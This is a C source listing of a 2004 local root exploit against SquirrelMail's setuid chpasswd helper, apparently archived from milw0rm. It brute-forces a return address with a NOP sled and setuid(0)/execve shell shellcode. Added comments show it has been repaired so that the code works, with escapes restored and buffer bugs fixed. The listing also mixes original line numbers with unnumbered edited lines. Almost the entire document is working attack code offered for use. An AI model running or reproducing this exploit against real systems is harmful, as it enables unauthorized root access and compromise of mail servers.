SquirrelMail chpasswd Local Root Bruteforce Exploit by h3m4n


  1     /*
  2
  3     **   PST_chpasswd_exp−v_b.c:
  4     **
  5     **   Squirrelmail chpasswd local root bruteforce exploit
  6     **   Author:
  7     **   Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org>
  8     **   www ph4nt0m net
  9     **   Notice:
  10    **   v_b: Local bruteforce version
  11    **   v_R: remote bruteforce version
  12    **
  13    **
  14    **   Greatze: #ph4nt0m,#music@0x557
  15    **   All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy...
  16    **   Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)...
  17    **
  18    **
  19    **   −=−=−=−=−=−=−=−=−=−= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =−=−=−=−=−=−=−=−=−=−
  20    **
  21    **   Date: 2004−04 # DO NOT DISTRIBUTE #
  22    **
**   Prerequisite: a local account in the webmaster, www or other web-server group
**   (the account under which the setuid chpasswd helper may be executed).
  24    **
  25    */
  26
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
  31
  32    #define NOP 0x90
#define Fuckpr0 "./chpasswd" /* path to the target chpasswd binary; adjust for your system */
  34    #define LOOP 2000 /* loop of bruteforce */
  35
/* setuid(0) shellcode by Matias Sedalo (3x) ^_^ */
  37
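/*
 * Linux/x86 payload: setuid(0) (lea eax,[ebx+0x17]; int 0x80) followed by
 * execve("//bin/sh", {"//bin/sh", NULL}, NULL). 29 bytes plus the terminating NUL.
 *
 * The extraction of this listing dropped the backslashes from the \xNN escapes,
 * so as published the array held the ASCII text "x31xdb..." rather than machine
 * code; the escapes are restored here. No byte is zero, which matters because
 * the buffer carrying this payload is handed to execl() as a C string.
 */
char shellcode[] = "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
                   "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";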
  40
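/*
 * Return the caller-visible stack pointer (%esp); main() uses it as the
 * starting guess for the return address. x86 only: the shellcode and the
 * int 0x80 convention in this file assume a 32-bit Linux target.
 *
 * The published version had no return statement and relied on the value
 * happening to sit in %eax when the function fell off the end. That is
 * undefined behavior in C and breaks silently under optimization; an
 * explicit asm output operand gives the function a defined return value.
 */
unsigned long get_esp(void) {

    unsigned long sp;

    __asm__ volatile ("movl %%esp, %%eax" : "=a" (sp));

    return sp;

}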
  46
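/*
 * malloc() wrapper that never returns NULL: on allocation failure it reports
 * the error and terminates the process.
 *
 * size: number of bytes to allocate.
 * Returns the allocated block; the caller owns it and releases it with free().
 * On failure the process exits with status -1 (255 to a POSIX shell), as in
 * the published version. The message goes to stderr so it cannot be lost in
 * stdout buffering, and the newline dropped by the extraction is restored.
 */
void *M_malloc(size_t size){

    void *block = malloc(size);

    if (block == NULL) {
        fprintf(stderr, "ERROR:virtual memory exhausted...\n");
        exit(-1);
    }

    return block;

}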
  64
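/*
 * Entry point. For each guess it forks a child that execs the chpasswd binary
 * with argv[1] = 150 bytes of the guessed return address and argv[2] = a
 * 600-byte NOP sled ending in the shellcode, then classifies the child's fate:
 * a child that does not exit normally counts as a miss and the guess moves up
 * by `offset`; a child that exits normally ends the search (exit status 1).
 * Returns 1 when LOOP guesses have been exhausted.
 *
 * Fixes relative to the published listing:
 *  - sizeof(buf2) is the size of a pointer, not of the 600-byte allocation, so
 *    the original memset length underflowed and every child crashed before it
 *    reached execl(); the buffer sizes are now named constants.
 *  - argv[1] is NUL-terminated. The original wrote 4-byte words at offsets
 *    0..148 into a 150-byte block (two bytes past the end) and never
 *    terminated it, so execl() read past the allocation.
 *  - the address is written as 4-byte units (the target is 32-bit), so the
 *    fill neither overruns nor changes meaning on an LP64 host.
 *  - execl()'s list terminator is (char *)NULL; fork() and wait() failures are
 *    checked; a child whose execl() fails _exit()s instead of falling through
 *    into the parent's loop and forking again.
 *  - stdout is flushed before fork()/exec so buffered text is not duplicated
 *    or lost; "%lx" is used for unsigned long; the "Signal:" line prints the
 *    terminating signal rather than the raw wait status.
 *  - "\n" and "\t" escapes lost in the extraction are restored.
 */
int main(void){

    enum { BUF1_LEN = 150, BUF2_LEN = 600 };

    unsigned long ret_addr;
    uint32_t ret32;
    int i, j = 0, offset = 2, status;
    size_t sled_len;
    char *buf1, *buf2;
    pid_t pid;

    ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode);

    printf("\t-------------------------------------------------------\n");
    printf("\t Squirrelmail chpasswd local root bruteforce exploit \n");
    printf("\t code By Bytes<Bytes[at]ph4nt0m.org> 2004 \n");
    printf("\t http://www.ph4nt0m.net \n");
    printf("\t#######################################################\n");

    sleep(1);

    printf("[+] Bruteforce......\n\n");

    sleep(2);

    /* One extra byte so argv[1] is a properly terminated C string. */
    buf1 = M_malloc(BUF1_LEN + 1);
    buf2 = M_malloc(BUF2_LEN);

    /* NOP sled, then the shellcode (including its NUL) near the end of buf2.
     * The original left 8 bytes of slack after the shellcode; that is kept. */
    sled_len = BUF2_LEN - strlen(shellcode) - 8;
    memset(buf2, NOP, BUF2_LEN);
    memcpy(buf2 + sled_len, shellcode, sizeof(shellcode));

    while (j <= LOOP) {

        /* Fill argv[1] with the current guess, 4 bytes at a time, and terminate it. */
        ret32 = (uint32_t)ret_addr;
        for (i = 0; i < BUF1_LEN; i += (int)sizeof(ret32)) {
            size_t left = (size_t)(BUF1_LEN - i);
            size_t chunk = left < sizeof(ret32) ? left : sizeof(ret32);
            memcpy(buf1 + i, &ret32, chunk);
        }
        buf1[BUF1_LEN] = '\0';

        /* Flush before fork() so buffered banner text is not emitted twice. */
        fflush(stdout);

        pid = fork();
        if (pid < 0) {
            perror("fork");
            exit(1);
        }
        if (pid == 0) {
            printf("buf1 = %s\n", buf1);
            fflush(stdout);
            execl(Fuckpr0, "chpasswd", buf1, buf2, (char *)NULL);
            /* Only reached if execl() failed; never return into the parent's loop. */
            perror("execl");
            _exit(127);
        }

        if (wait(&status) < 0) {
            perror("wait");
            exit(1);
        }

        if (WIFSIGNALED(status)) {
            printf("[-] Signal: #%i\n", WTERMSIG(status));
        }

        if (WIFEXITED(status) != 0) {
            /* Normal exit is treated as a hit (or a clean rejection); stop here. */
            printf("[=] Step.%i: 0x%lx\n[~] Exiting...\n", (j / 2), ret_addr);
            exit(1);
        } else {
            ret_addr += offset;
            j += offset;
            printf("[=] Offset:%d Use ret:0x%lx\n", j, ret_addr);
        }

    }

    free(buf1);
    free(buf2);

    return 1;

}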
  143
// milw0rm.com [2004-08-25]





								